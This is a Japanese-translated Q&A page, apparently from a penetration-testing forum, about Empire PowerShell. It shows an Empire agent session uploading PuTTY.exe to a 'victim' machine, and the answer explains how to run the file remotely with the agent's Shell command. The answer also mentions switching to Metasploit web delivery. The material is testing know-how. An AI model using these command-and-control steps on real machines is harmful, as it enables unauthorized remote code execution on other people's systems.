web-dev-qa-db-ja.com

帝国のPowershellコマンドのテスト

Empire Powershellをテストしています。

被害者のマシンにアップロードしたファイルをリモートで実行するにはどうすればよいのでしょうか。

(Empire: ANHGP22NCFLPVAAH) > cd Desktop
(Empire: ANHGP22NCFLPVAAH) > 
Path                   
----                   
C:\Users\Testpc\Desktop
(Empire: ANHGP22NCFLPVAAH) > upload /root/Testpc/PuTTY.exe
(Empire: ANHGP22NCFLPVAAH) > cd Desktop
(Empire: ANHGP22NCFLPVAAH) > 
Path                   
----                   
C:\Users\Testpc\Desktop
(Empire: ANHGP22NCFLPVAAH) > dir
(Empire: ANHGP22NCFLPVAAH) > 
LastWriteTime      Length Name                                       
-------------      ------ ----                                       
11-1-2017 23:27:49    282 desktop.ini                                
20-2-2017 0:50:37  531368 PuTTY.exe 
(Empire: ANHGP22NCFLPVAAH) > (what are the commands to remotly execute the PuTTY.exe file)
penetration-testpowershell
4
alien187

Shellコマンドを使用できます。

ヘルプ画面から:

シェル:シェルコマンドを使用するようにエージェントに要求します。

あなたの場合、PuTTY.exeを実行すると次のようになります。

(Empire: Win10Priv) > Shell <pathtoputty>\PuTTY.exe

EmpireからMsfに移行する場合、これを行うと、Metasploit Web配信コマンドを実行することもできます。

1
Carter Brainerd